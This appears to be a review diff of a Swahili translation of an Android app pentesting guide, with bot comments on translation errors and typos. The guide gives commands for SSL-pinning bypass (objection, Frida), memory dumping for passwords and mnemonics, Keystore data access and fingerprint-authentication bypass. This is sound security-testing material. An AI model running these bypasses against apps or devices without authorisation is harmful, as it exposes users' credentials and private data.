Notes and tips
- Skanning ya haraka kwenye apps kubwa kupitia multi-threading na memory-mapped I/O; regex zilizo pre-compiled hupunguza mzigo/matokeo ya uwongo.
- Kuchanganua haraka kwenye apps kubwa kupitia multi-threading na memory-mapped I/O; pre-compiled regex hupunguza overhead/false positives.
- Pattern collection: https://github.com/aancw/smali-sslpin-patterns
- Malengo ya kawaida ya utambuzi kwa kuchambua ifuatayo:
- OkHttp: CertificatePinner usage, setCertificatePinner, okhttp3/okhttp package references
- Custom TrustManagers: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
- Custom SSL contexts: SSLContext.getInstance + SSLContext.init with custom managers
- Declarative pins in res/xml network security config and manifest references
- Tumia maeneo yaliyolingana kupanga Frida hooks, static patches, au mapitio ya config kabla ya majaribio ya dynamic.
- Malengo ya kawaida ya utambuzi kwa kuchunguza ifuatayo:
- OkHttp: matumizi ya CertificatePinner, setCertificatePinner, okhttp3/okhttp package references
- TrustManagers maalum: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
- SSL contexts maalum: SSLContext.getInstance + SSLContext.init with custom managers
- Pins zilizotangazwa katika res/xml network security config na marejeo ya manifest
- Tumia maeneo yaliyoendana kupanga Frida hooks, static patches, au mapitio ya config kabla ya majaribio ya dynamic.
#### Bypassing SSL Pinning
#### Kuepuka SSL Pinning
When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Various methods are available for this purpose:
Wakati SSL Pinning imeanzishwa, kuepuka itakuwa muhimu ili kuchunguza trafiki ya HTTPS. Mbinu mbalimbali zinapatikana kwa madhumuni haya:
- Automatically **modify** the **apk** to **bypass** SSLPinning with [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). The best pro of this option, is that you won't need root to bypass the SSL Pinning, but you will need to delete the application and reinstall the new one, and this won't always work.
- You could use **Frida** (discussed below) to bypass this protection. Here you have a guide to use Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- You can also try to **automatically bypass SSL Pinning** using [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- You can also try to **automatically bypass SSL Pinning** using **MobSF dynamic analysis** (explained below)
- If you still think that there is some traffic that you aren't capturing you can try to **forward the traffic to burp using iptables**. Read this blog: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
- Badilisha kwa otomatiki **apk** ili **kuepuka** SSLPinning kwa kutumia [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida kubwa ya chaguo hili ni kwamba hautahitaji root kuepuka SSL Pinning, lakini utahitaji kufuta programu na kusakinisha mpya, na hii si kila wakati itafanya kazi.
- Unaweza kutumia **Frida** (imejadiliwa hapa chini) kuepuka ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- Unaweza pia kujaribu **kuepuka moja kwa moja SSL Pinning** ukitumia [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- Unaweza pia kujaribu **kuepuka moja kwa moja SSL Pinning** ukitumia **MobSF dynamic analysis** (imeelezewa hapa chini)
- Ikiwa bado unaona kuna trafiki ambayo hauikamata, unaweza kujaribu **kupeleka trafiki kwa Burp kwa kutumia iptables**. Soma blogu hii: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
#### Looking for Common Web Vulnerabilities
#### Kutafuta Udhaifu wa Wavuti wa Kawaida
Ni muhimu pia kutafuta vulnerabilities za kawaida za web ndani ya application. Maelezo ya kina juu ya utambuzi na kupunguza vulnerabilities hizi hayamo katika muhtasari huu lakini yameelezwa kwa kina mahali pengine.
Ni muhimu pia kutafuta udhaifu wa kawaida wa wavuti ndani ya programu. Maelezo ya kina juu ya kutambua na kupunguza udhaifu hivi ni kubwa kuliko muhtasari huu lakini yameelezewa kwa undani mahali pengine.
### Frida
[Frida](https://www.frida.re) is a dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.\
**Unaweza kufikia application inayokimbia na ku-hook methods wakati wa runtime ili kubadilisha tabia, kubadilisha values, kutoa values, kuendesha code tofauti...**\
Kama unataka pentest Android applications ni muhimu ujue jinsi ya kutumia Frida.
[Frida](https://www.frida.re) ni toolkit ya instrumentation ya dynamic kwa waendelezaji, wachambuzi wa reverse-engineering, na watafiti wa usalama.\
**Unaweza kufikia application inayokwama na ku-hook methods wakati wa runtime ili kubadilisha tabia, kubadilisha thamani, kutoa thamani, kuendesha code tofauti...**\
Ikiwa unataka kufanya pentest za Android applications unahitaji kujua jinsi ya kutumia Frida.
- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Some "GUI" for actions with Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection is great to automate the use of Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- You can find some Awesome Frida scripts here: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Try to bypass anti-debugging / anti-frida mechanisms loading Frida as in indicated in [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (tool [linjector](https://github.com/erfur/linjector-rs))
- Jifunze jinsi ya kutumia Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Baadhi ya "GUI" kwa vitendo na Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection ni nzuri kuendesha otomatiki matumizi ya Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- Unaweza kupata baadhi ya Awesome Frida scripts hapa: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Jaribu kuepuka mekanismi za anti-debugging / anti-frida kwa kuanzisha Frida kama inavyoelezwa katika [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (zana [linjector](https://github.com/erfur/linjector-rs))
#### Anti-instrumentation & SSL pinning bypass workflow
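Review bot: "application inayokwama" in the new Frida paragraph means an application that is stuck or hanging, not a running one; the replaced wording "application inayokimbia" was the correct rendering of "running application" and should be restored. In the same hunk the tool name is misspelled "Ojection" on both the old and the new bullet ("Ojection ni nzuri kuendesha otomatiki matumizi ya Frida"); the link target is github.com/sensepost/objection, so the text should read "objection".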
@ -526,9 +530,9 @@ android-anti-instrumentation-and-ssl-pinning-bypass.md
### **Dump Memory - Fridump**
Kagua kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi, kama passwords au mnemonics.
Angalia kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi kama passwords au mnemonics.
Using [**Fridump3**](https://github.com/rootbsd/fridump3) you can dump the memory of the app with:
Ukijumuisha [**Fridump3**](https://github.com/rootbsd/fridump3) unaweza kufanya dump ya memory ya app kwa:
```bash
# With PID
python3 fridump3.py -u <PID>
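Review bot: "Ukijumuisha Fridump3" means "if you include Fridump3"; the sentence being translated says "Using Fridump3 you can dump the memory of the app with:", so "Ukitumia Fridump3" is the accurate lead-in. The rest of the line ("unaweza kufanya dump ya memory ya app kwa:") is fine.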
@ -541,116 +545,116 @@ Hii ita-dump kumbukumbu katika folda ./dump, na hapo unaweza kutumia grep kwa ki
```bash
strings * | grep -E "^[a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+$"
```
### **Taarifa nyeti katika Keystore**
### **Data nyeti katika Keystore**
Katika Android Keystore ni mahali pazuri zaidi pa kuhifadhi taarifa nyeti, hata hivyo, kwa idhini za kutosha bado ni **possible to access it**. Kwa kuwa applications mara nyingi huzihifadhi hapa **sensitive data in clear text**, pentests zinapaswa kuichunguza kwani kama root user au mtu mwenye ufikiaji wa kimwili kwa kifaa anaweza kuiba data hii.
Katika Android, Keystore ni mahali pazuri kuhifadhi data nyeti, hata hivyo, kwa ruhusa za kutosha bado inawezekana kuifikia. Kwa kuwa applications zinaweza kuhifadhi hapa sensitive data in clear text, pentests zinapaswa kuangalia hilo kwa mtumiaji root au mtu mwenye ufikiaji wa kimwili wa kifaa ambaye anaweza kuiba data hiyo.
Hata kama app imehifadhi data kwenye keystore, data inapaswa kuwa encrypted.
Hata kama app ilihifadhi data katika keystore, data hiyo inapaswa kuwa encrypted.
Ili kufikia data ndani ya keystore unaweza kutumia Frida script hii: [https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js](https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js)
Ili kufikia data ndani ya keystore unaweza kutumia script ya Frida: [https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js](https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js)
```bash
frida -U -f com.example.app -l frida-scripts/tracer-cipher.js
```
### **Fingerprint/Biometrics Bypass**
Kutumia Frida script ifuatayo kunaweza kuwa inawezekana **bypass fingerprint authentication** ambayo Android applications zinaweza kufanya ili **kulinda maeneo fulani nyeti:**
Kwa kutumia Frida script ifuatayo inaweza kuwa inawezekana **bypass fingerprint authentication** Android applications zinaweza kufanya ili **kulinda maeneo fulani nyeti:**
```bash
frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f <app.package>
```
### **Picha za Mandharinyuma**
Unapoiweka programu katika mandharinyuma, Android huhifadhi **snapshot ya programu** ili inaporudishwa mbele inaanza kupakia picha hiyo kabla ya app, hivyo inaonekana kama app ilipakia haraka zaidi.
Unapoweka application kwa mandharinyuma, Android huhifadhi **snapshot ya application** ili inaporejeshwa mbele inaanza kupakia picha kabla ya app, hivyo inaonekana kama app ilipakia haraka.
Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba taarifa hiyo** (kumbuka unahitaji root ili kuifikia).
Snapshots kawaida huhifadhiwa hapa: **`/data/system_ce/0/snapshots`**
Snapshots kawaida huhifadhiwa karibu: **`/data/system_ce/0/snapshots`**
Android inatoa njia ya **kuzuia kunakiliwa kwa screenshot kwa kuweka parameter ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanachukuliwa kuwa salama, na kuzuia yaonekana katika screenshots au kuonekana kwenye displays zisizo salama.
Android inatoa njia ya **kuzuia the screenshot capture kwa kuweka parameter ya layout FLAG_SECURE**. Kwa kutumia flag hii, maudhui ya window yanachukuliwa kuwa salama, kuyazuia kuonekana kwenye screenshots au kuonekana kwenye non-secure displays.
```bash
getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
```
### **Android Application Analyzer**
Chombo hiki kinaweza kukusaidia kusimamia zana mbalimbali wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
Kifaa hiki kinaweza kukusaidia kusimamia zana mbalimbali wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
### Intent Injection
Developers mara nyingi hufanya proxy components kama activities, services, na broadcast receivers zinazoshughulikia Intents hizi na kuzipitisha kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Waundaji mara nyingi huunda proxy components kama activities, services, na broadcast receivers ambazo zinashughulikia Intent hizi na kuzipitisha kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Hatari iko kwenye kuruhusu attackers kuanzisha non-exported app components au kupata access kwa sensitive content providers kwa kupindisha Intents hizi. Mfano muhimu ni component ya `WebView` kubadilisha URLs kuwa Intent objects kupitia `Intent.parseUri(...)` na kisha kuzitekeleza, jambo ambalo linaweza kusababisha malicious Intent injections.
Hatari iko katika kuruhusu attackers kuanzisha non-exported app components au kupata access kwa sensitive content providers kwa kupelekewa Intent hizi kwa njia isiyo sahihi. Mfano wa kuzingatia ni component ya `WebView` kubadilisha URLs kuwa `Intent` objects kupitia `Intent.parseUri(...)` kisha kuziendesha, jambo ambalo linaweza kusababisha malicious Intent injections.
### Essential Takeaways
### Vidokezo Muhimu
- **Intent Injection** ni sawa na tatizo la Open Redirect kwenye web.
- Exploits zinahusisha kupitisha `Intent` objects kama extras, ambazo zinaweza kualikwa upya ili kutekeleza operations zisizo salama.
- **Intent Injection** ni sawa na Open Redirect ya web.
- Exploits involve passing `Intent` objects as extras, which can be redirected to execute unsafe operations.
- Inaweza kufichua non-exported components na content providers kwa attackers.
- Ubadilishaji wa URL kwa Intent kwenye `WebView` unaweza kuwezesha actions zisizokusudiwa.
- `WebView`s URL to `Intent` conversion inaweza kuwezesha vitendo visivyotarajiwa.
### Android Client Side Injections and others
Labda unafahamu aina hizi za vulnerabilities kutoka Web. Lazima uwe waangalifu hasa na vulnerabilities hizi katika Android application:
Huenda unajua aina hizi za udhaifu kutoka Web. Lazima uwe makini hasa na udhaifu hizi katika application ya Android:
- **SQL Injection:** Unaposhughulika na dynamic queries au Content-Providers hakikisha unatumia parameterized queries.
- **JavaScript Injection (XSS):** Thibitisha kwamba JavaScript na Plugin support zimezimwa kwa WebViews yoyote (zimeteuliwa kuwa disabled by default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinapaswa kuwa na access kwa file system zimezima (zimeteuliwa kuwa enabled by default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika visa kadhaa wakati android application inapomaliza session cookie haifutwi au inaweza hata kuokolewa kwenye disk
- **SQL Injection:** When dealing with dynamic queries or Content-Providers ensure you are using parameterized queries.
- **JavaScript Injection (XSS):** Verify that JavaScript and Plugin support is disabled for any WebViews (disabled by default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews should have access to the file system disabled (enabled by default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
- [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags)
---
## Automatic Analysis
## Uchambuzi Otomatiki
### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
**Static analysis**
**Uchambuzi wa statiki**
![](<../../images/image (866).png>)
**Vulnerability assessment of the application** kwa kutumia frontend nzuri ya web. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa environment).
**Tathmini ya udhaifu ya programu** kwa kutumia frontend nzuri ya wavuti. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa mazingira).
```bash
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
```
Note that MobSF can analyse **Android**(apk)**, IOS**(ipa) **and Windows**(apx) applications (_Windows applications must be analyzed from a MobSF installed in a Windows host_).\
Pia, ikiwa utaunda faili la **ZIP** lenye source code ya app ya **Android** au **IOS** (nenda kwenye root folder ya application, chagua kila kitu na unda ZIPfile), itauweza kuchambua pia.
Kumbuka kwamba MobSF inaweza kuchambua **Android**(apk)**, IOS**(ipa) **and Windows**(apx) applications (_Windows applications must be analyzed from a MobSF installed in a Windows host_).\
Pia, ikiwa utaunda faili ya **ZIP** yenye msimbo wa chanzo wa app ya **Android** au **IOS** (nenda kwenye root folder ya application, chagua kila kitu na unda ZIPfile), itaweza kuichambua pia.
MobSF pia inakuwezesha kufanya **diff/Compare** ya analysis na kuunganisha **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuifanya iwe enabled: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi the **hash** itapakiwa badala ya faili.
MobSF pia inakuwezesha kufanya **diff/Compare** za uchambuzi na kuunganisha **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuiwezesha: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi **hash** itaupload badala ya faili.
### Assisted Dynamic analysis with MobSF
**MobSF** inaweza pia kuwa msaada mkubwa kwa **dynamic analysis** kwenye **Android**, lakini katika kesi hiyo utahitaji kusanisha MobSF na **genymotion** kwenye host yako (VM au Docker haitafanya kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
**MobSF** pia inaweza kuwa msaada mkubwa kwa ajili ya **dynamic analysis** katika **Android**, lakini katika kesi hiyo utahitaji kusakinisha MobSF na **genymotion** kwenye host yako (a VM or Docker won't work). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
The **MobSF dynamic analyser** inaweza:
- **Dump application data** (URLs, logs, clipboard, screenshots ulizofanya mwenyewe, screenshots zilizofanywa na "**Exported Activity Tester**", emails, SQLite databases, XML files, na faili nyingine zilizoundwa). Haya yote hufanywa moja kwa moja isipokuwa screenshots, lazima ubofye wakati unataka screenshot au lazima ubofye "**Exported Activity Tester**" ili kupata screenshots za exported activities zote.
- **Dump application data** (URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files). Yote haya hufanywa kiotomatiki isipokuwa screenshots; unahitaji kubonyeza wakati unapotaka screenshot au unahitaji kubonyeza "**Exported Activity Tester**" kupata screenshots za exported activities zote.
- Capture **HTTPS traffic**
- Use **Frida** to obtain **runtime** **information**
Kutoka kwenye Android **versions > 5**, itaanzisha **Frida** kiotomatiki na itaweka global **proxy** settings ili **capture** traffic. Itakamata traffic tu kutoka kwa application inayojaribiwa.
From android **versions > 5**, it will **automatically start Frida** and will set global **proxy** settings to **capture** traffic. It will only capture traffic from the tested application.
**Frida**
Kwa default, itatumia baadhi ya Frida Scripts ili **bypass SSL pinning**, **root detection** na **debugger detection** na pia **monitor interesting APIs**.\
MobSF pia inaweza **invoke exported activities**, kuchukua **screenshots** zao na **kuzi hifadhi** kwa ajili ya report.
By default, it will also use some Frida Scripts to **bypass SSL pinning**, **root detection** and **debugger detection** and to **monitor interesting APIs**.\
MobSF can also **invoke exported activities**, grab **screenshots** of them and **save** them for the report.
Ili **kuanza** dynamic testing bonyeza button ya kijani: "**Start Instrumentation**". Bonyeza "**Frida Live Logs**" kuona logs zinazozalishwa na Frida scripts na "**Live API Monitor**" kuona invoke zote za hooked methods, arguments zilizotumika na returned values (hii itaonekana baada ya kubofya "Start Instrumentation").\
MobSF pia inakuwezesha kupakia Frida scripts zako mwenyewe (kutuma matokeo ya Frida scripts zako kwa MobSF tumia function `send()`). Pia ina **several pre-written scripts** ambazo unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na kisha "**Start Instrumentation**" (utaweza kuona logs za script hizo ndani ya "**Frida Live Logs**").
To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\
MobSF also allows you to load your own **Frida scripts** (to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**").
![](<../../images/image (419).png>)
Zaidi ya hayo, una baadhi ya Auxiliary Frida functionalities:
Moreover, you have some Auxiliary Frida functionalities:
- **Enumerate Loaded Classes**: Itachapisha classes zote zilizopakiwa
- **Capture Strings**: Itachapisha strings zote zinazopigwa capture wakati wa kutumia application (inatoa noise nyingi)
- **Capture String Comparisons**: Inaweza kuwa muhimu sana. Itaonyesha **strings mbili zinazolinganishwa** na kama result ilikuwa True au False.
- **Enumerate Class Methods**: Weka jina la class (kama "java.io.File") na itachapisha methods zote za class hiyo.
- **Search Class Pattern**: Tafuta classes kwa pattern
- **Trace Class Methods**: **Trace** class nzima (ona inputs na outputs za methods zote za class). Kumbuka kwamba kwa default MobSF inafuatilia baadhi ya Android Api methods zinazovutia.
- **Enumerate Loaded Classes**: It will print all the loaded classes
- **Capture Strings**: It will print all the capture strings while using the application (super noisy)
- **Capture String Comparisons**: Could be very useful. It will **show the 2 strings being compared** and if the result was True or False.
- **Enumerate Class Methods**: Put the class name (like "java.io.File") and it will print all the methods of the class.
- **Search Class Pattern**: Search classes by pattern
- **Trace Class Methods**: **Trace** a **whole class** (see inputs and outputs of all methods of th class). Remember that by default MobSF traces several interesting Android Api methods.
Mara baada ya kuchagua module ya auxiliary unayotaka kutumia lazima ubofye "**Start Intrumentation**" na utaona outputs zote ndani ya "**Frida Live Logs**".
Once you have selected the auxiliary module you want to use you need to press "**Start Intrumentation**" and you will see all the outputs in "**Frida Live Logs**".
**Shell**
MobSF pia inakuleta shell yenye baadhi ya amri za **adb**, amri za **MobSF**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zinazovutia:
Mobsf pia inakuja na shell yenye baadhi ya amri za **adb**, **MobSF commands**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zenye kuvutia:
```bash
help
shell ls
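Review bot: several incoming paragraphs in this hunk are in English where the line they replace was Swahili: "Exploits involve passing Intent objects as extras...", the four "SQL Injection" / "JavaScript Injection" / "Local File Inclusion" / "Eternal cookies" bullets, "From android versions > 5, it will automatically start Frida...", "By default, it will also use some Frida Scripts...", "To start the dynamic testing press the green bottom...", "Moreover, you have some Auxiliary Frida functionalities:", the six bullets from "Enumerate Loaded Classes" to "Trace Class Methods", and "Once you have selected the auxiliary module...". If the second line of each pair is the text being committed, the translation regressed for the whole MobSF Frida section and should be re-run; the English that comes back also carries the typos "green bottom" (button), "Friday scripts" (Frida) and "Start Intrumentation", the last one present on both sides. Two wording points on lines that were translated: the Keystore sentence "pentests zinapaswa kuangalia hilo kwa mtumiaji root au mtu mwenye ufikiaji wa kimwili wa kifaa" drops the reason given in the source (check it because a root user or someone with physical access can steal the data); "kwani mtumiaji root au mtu mwenye ufikiaji wa kimwili wa kifaa anaweza kuiba data hiyo", as in the replaced line, keeps it. "Kifaa hiki" for android_application_analyzer means "this device"; "Zana hii" or the replaced "Chombo hiki" (this tool) is right, and "(a VM or Docker won't work)" inside the genymotion sentence is left untranslated. Finally, the VirusTotal settings snippet shows `VT_ENABLED = TRUE` and `VT_UPLOAD = TRUE` while the next sentence uses `False`; the file named is _MobSF/settings.py_, so the Python literal is `True`.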
@ -661,32 +665,32 @@ receivers
```
**Vifaa vya HTTP**
Wakati trafiki ya HTTP inapokamatwa unaweza kuona muonekano mbaya wa trafiki iliyokamatwa kwenye kitufe cha chini "**HTTP(S) Traffic**" au muonekano mzuri kwenye kitufe cha kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_ --> press "**Send to Fuzzer**" --> _select the proxy address_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Wakati traffic ya HTTP inapokamatwa unaweza kuona muonekano mbaya wa traffic iliyokamatwa kwenye kitufe cha chini "**HTTP(S) Traffic**" au muonekano mzuri kwenye kitufe cha kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _amsha Burp -->_ _zima Intercept --> katika MobSB HTTPTools chagua request_ --> bonyeza "**Send to Fuzzer**" --> _chagua anwani ya proxy_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Baada ya kumaliza dynamic analysis na MobSF unaweza kubofya "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu.
Mara utakapomaliza uchambuzi wa dynamic na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta vulnerabilities.
> [!TIP]
> Baada ya kufanya dynamic analysis na MobSF mipangilio ya proxy inaweza kuwa imechafuka na hautaweza kuirekebisha kupitia GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
> Baada ya kufanya uchambuzi wa dynamic na MobSF mipangilio ya proxy inaweza kuwa imechanganikwa na hutaweza kuirekebisha kutoka GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
>
> ```
> adb shell settings put global http_proxy :0
> ```
### Uchambuzi wa Dynamic Ulio kusaidiwa na Inspeckage
### Assisted Dynamic Analysis with Inspeckage
Unaweza kupata zana kutoka [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
Zana hii itatumia baadhi ya **Hooks** kukujulisha **kinachoendelea katika application** huku ukifanya **dynamic analysis**.
Unaweza kupata tool hii kutoka kwa [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
Chombo hiki kinatumia baadhi ya **Hooks** kukujulisha **kinachotokea kwenye application** wakati unafanya **dynamic analysis**.
### [Yaazhini](https://www.vegabird.com/yaazhini/)
Hii ni **zana nzuri za kufanya static analysis kwa GUI**
Hii ni **tool nzuri ya kufanya static analysis kwa GUI**
![](<../../images/image (741).png>)
### [Qark](https://github.com/linkedin/qark)
Zana hii imeundwa kutafuta udhaifu mbalimbali zinazohusiana na **security** za Android application, iwe katika **source code** au **packaged APKs**. Zana pia ina uwezo wa kuunda "Proof-of-Concept" deployable APK na **ADB commands**, ili ku-exploit baadhi ya udhaifu uliopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
Tool hii imeundwa kutafuta aina mbalimbali za **security related Android application vulnerabilities**, iwe katika **source code** au **packaged APKs**. Tool pia ina uwezo wa **kuunda "Proof-of-Concept" deployable APK** na **ADB commands**, ili ku-exploit baadhi ya vulnerabilities zilizopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
```bash
pip3 install --user qark # --user is only needed if not using a virtualenv
qark --apk path/to/my.apk
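Review bot: "MobSB HTTPTools" survives on both sides of the HTTP tools paragraph; the tool is MobSF. The proxy address link `[http://127.0.0.1:8080\\](http://127.0.0.1:8080)` has two stray backslashes inside the link text that will render literally and should be dropped. The new heading "Vifaa vya HTTP" reads as "HTTP devices"; since the section is about MobSF's HTTPTools, "Zana za HTTP" is clearer.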
@ -695,20 +699,20 @@ qark --java path/to/specific/java/file.java
```
### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
- Inaonyesha faili zote zilizotolewa kwa rejea rahisi
- Hufanya decompile kwa faili za APK kwa njia ya otomatiki hadi muundo wa Java na Smali
- Huchambua AndroidManifest.xml kwa ajili ya udhaifu na tabia za kawaida
- Uchambuzi wa msimbo wa chanzo wa static kwa ajili ya udhaifu na tabia za kawaida
- Inaonyesha mafaili yote yaliyotolewa kwa marejeo rahisi
- Moja kwa moja decompile APK files hadi format ya Java na Smali
- Huchambua AndroidManifest.xml kwa common vulnerabilities na tabia
- Static source code analysis kwa common vulnerabilities na tabia
- Taarifa za kifaa
- na mengi zaidi
- na zaidi
```bash
reverse-apk relative/path/to/APP.apk
```
### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
SUPER ni programu ya mstari wa amri inayoweza kutumika kwenye Windows, MacOS X na Linux, ambayo inachambua faili za _.apk_ kutafuta vulnerabilities. Inafanya hivyo kwa kuzipakua APKs na kutumia mfululizo wa kanuni kugundua vulnerabilities hizo.
SUPER ni programu ya command-line inayoweza kutumiwa kwenye Windows, MacOS X na Linux, ambayo inachambua faili za _.apk_ ili kutafuta vulnerabilities. Inafanya hivyo kwa ku-decompress APKs na kutumia mfululizo wa sheria ili kugundua vulnerabilities hizo.
Kanuni zote ziko katika faili la `rules.json`, na kila kampuni au mjaribu anaweza kuunda kanuni zao ili kuchambua wanazohitaji.
Sheria zote ziko kwenye faili `rules.json`, na kila kampuni au mjaribu anaweza kuunda sheria zake za kuchambua wanachohitaji.
Pakua binaries za hivi karibuni kutoka kwenye [download page](https://superanalyzer.rocks/download.html)
```
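Review bot: the new ReverseAPK bullets are less readable than the ones they replace: "Moja kwa moja decompile APK files hadi format ya Java na Smali" switches to English mid-sentence, while the replaced "Hufanya decompile kwa faili za APK kwa njia ya otomatiki hadi muundo wa Java na Smali" reads naturally; likewise "Huchambua AndroidManifest.xml kwa common vulnerabilities na tabia" versus "kwa ajili ya udhaifu na tabia za kawaida". Keep the earlier renderings.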
@ -718,9 +722,9 @@ super-analyzer {apk_file}
![](<../../images/image (297).png>)
